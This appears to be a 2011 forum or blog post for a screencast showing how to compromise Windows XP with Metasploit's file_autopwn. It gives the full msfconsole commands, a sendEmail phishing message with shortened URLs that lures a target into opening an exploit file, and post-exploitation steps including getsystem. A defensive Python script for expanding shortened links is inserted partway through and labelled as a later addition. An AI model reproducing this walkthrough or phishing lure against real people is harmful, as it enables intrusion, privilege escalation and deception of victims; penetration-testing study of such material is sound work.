Watch video on-line: http://blip.tv/file/4924033
Download video: http://www.mediafire.com/?c97d39n4df5bqda
This screencast demonstrates Metasploit's ability to automatically generate exploit files: each file is crafted so that, when read by a particular application, it triggers that application's vulnerability.
After choosing a file to use, the attacker sends an email to the target containing a masked URL to the exploit file and a link to the application itself, which is the "correct" (vulnerable) version of it too!
Other examples of Metasploit's "autopwn" features: db_autopwn and browser_autopwn
What do I need?
* Metasploit – (Can be found on BackTrack 4-R2). Download here
* SendEmail + SMTP details – (SendEmail can be found on BackTrack 4-R2). Download sendemail here
* URL shortening service – (can be found using an internet search engine).
* Start network services and obtain an IP address
* Start metasploit and configure file_autopwn
* Wait for web server to be active
* Browse the available files and view the information for the chosen one.
* Discover homepage and download information
* Create masked URLs
* Socially engineer an email to the target with all the information
* Wait for target to download the file and load it in the program
* Game Over
Commands: *Due to the forum's security, I'm unable to post the complete command list.*
Walk-through code:
start-network
dhclient eth0
clear
msfconsole
search autopwn
use server/file_autopwn
show options
set LHOST 192.168.0.33
set SRVPORT 80
set URIPATH /
#set SSL true
#set ExitOnSession false
show options
#show advanced
#set CREATEFILES false
run
Firefox -> 192.168.0.33 -> Ctrl + F -> fatplayer
search fatplayer
info windows/fileformat/fatplayer_wav
sendEmail -f "*************************************" -t ***************************** -u "You've gonna listen to this" -m "O.M.G. CHECK THIS OUT. You HAVE to listen to this as soon as you can [URL] You'll need to grab this ([URL]) to listen to this." -s [smtp host] -xu [smtp user] -xp [smtp pass]
#IE -> [target's online email] -> Login -> Download FatPlayer -> Install/Extract -> Click exploit link
sessions -l -v
sessions -i 1
sysinfo
getuid
getsystem
getuid
The attacker approaches this attack differently: rather than the operating system (OS) itself, they target desktop applications installed on the OS, using a collection of "file exploits".
To start things, the attacker starts Metasploit and locates the file_autopwn module. After examining the required information, the attacker proceeds by entering all the details which are needed. Once this has been done, the attacker sets Metasploit to work creating a mass of exploit files; after these have been created, Metasploit sets up a web server which is going to be used as the delivery method.
The attacker visits the web server themselves to see what is available. After choosing the program "fatplayer", they decide to increase their chance of success by finding the program's homepage so they can pass this information on to the target, which makes it "nice and easy" for the target to download and run.
The attacker needs to make sure, however, that they point the target at a vulnerable version of the program, so they check what information is given about the file exploit.
The attacker chooses to socially engineer the target by sending them an email with a link to the file setup and a brief description. To help increase success, the attacker masks the URLs of both files by using URL shortening services. Once the target clicks on the shortened link, they are automatically redirected to the "longer URL".
The attacker then simply has to wait to see if the target "falls for it" and runs the exploit file.... which the target does. =)
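The shortened links above work because each click is silently redirected to the "longer URL". The following is an added example, not part of the original post and not Metasploit code, showing the defender-side check: expanding a shortened link hop by hop with HEAD requests (so the exploit file itself is never downloaded) and flagging when the final destination is a raw IP address, which is what a throwaway web server such as the one on LHOST 192.168.0.33 in the walk-through looks like. The short.example and vendor.example names and the redirect table are constructed for the offline demonstration; `http_head` is the real fetcher you would pass in against live links.

```python
"""Expand a shortened link hop by hop without fetching the final body.

Added example for triaging the masked URLs this post describes; it is not
part of the original post or of Metasploit. The redirect table and the
short.example / vendor.example names are constructed for the offline demo.
"""
import ipaddress
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlparse

REDIRECT_CODES = {301, 302, 303, 307, 308}


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib from following redirects so each hop can be recorded."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_head(url, timeout=5):
    """Real fetcher: HEAD one URL and return (status, Location header or None).

    Only headers are requested, so the linked file is never downloaded.
    """
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, method="HEAD")
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:
        # With redirects disabled, 3xx responses surface here as errors.
        return err.code, err.headers.get("Location")


def expand_url(url, fetch=http_head, max_hops=10):
    """Follow the redirect chain one hop at a time.

    Returns (chain, final_url, outcome) where outcome is 'resolved',
    'loop' or 'too_many_hops'.
    """
    chain = [url]
    seen = {url}
    for _ in range(max_hops):
        status, location = fetch(url)
        if status not in REDIRECT_CODES or not location:
            return chain, url, "resolved"
        url = urljoin(url, location)  # Location may be relative
        chain.append(url)
        if url in seen:
            return chain, url, "loop"
        seen.add(url)
    return chain, url, "too_many_hops"


def triage(url, fetch=http_head):
    """Summarise where a link really goes and flag a raw-IP destination."""
    chain, final, outcome = expand_url(url, fetch)
    host = urlparse(final).hostname or ""
    try:
        ipaddress.ip_address(host)
        raw_ip = True
    except ValueError:
        raw_ip = False
    return {
        "chain": chain,
        "final": final,
        "outcome": outcome,
        "final_host": host,
        "raw_ip": raw_ip,
        "short_host": urlparse(chain[0]).hostname or "",
    }


# Constructed redirect table standing in for a shortener and the lure in the
# post (192.168.0.33 is the LHOST used in the walk-through, not a live host).
FAKE_REDIRECTS = {
    "http://short.example/abc": (301, "http://192.168.0.33/"),
    "http://short.example/xyz": (302, "https://vendor.example/download"),
    "http://short.example/rel": (302, "/dest"),
    "http://short.example/loop": (302, "http://short.example/loop2"),
    "http://short.example/loop2": (302, "http://short.example/loop"),
}


def fake_fetch(url):
    """Offline stand-in for http_head backed by FAKE_REDIRECTS."""
    return FAKE_REDIRECTS.get(url, (200, None))


if __name__ == "__main__":
    for link in FAKE_REDIRECTS:
        r = triage(link, fake_fetch)
        print(f"{link} -> {r['final']} [{r['outcome']}] raw_ip={r['raw_ip']}")
```

Swapping `fake_fetch` for the default `http_head` runs the same logic against real links; the hop cap and loop detection keep a hostile redirect chain from hanging the check, and a result whose `final_host` is a bare IP or differs from the host the email claims to link to is worth a closer look before anyone opens the file.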
* You will need to find/use your own SMTP details.
* You can use any number of URL shortening services.
* You could have used any of the files generated by Metasploit.
* You could have attached the file instead of linking to it in the email (see here for an example); however, a lot of email services now have anti-virus checking built in...
Song: Sidney Samson (featuring Wizard Sleeve) - Riverside (Lets Go!) (Warren Clarke Remix)
Video length: 6:00
Capture length: 18:11
Blog Post: http://g0tmi1k.blogspot.com/2011/03/video-owning-windows-xp-sp3-vs.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/38998-%5Bvideo%5D-owning-windows-xp-sp3-vs-metasploits-file_autopwn.html#post192417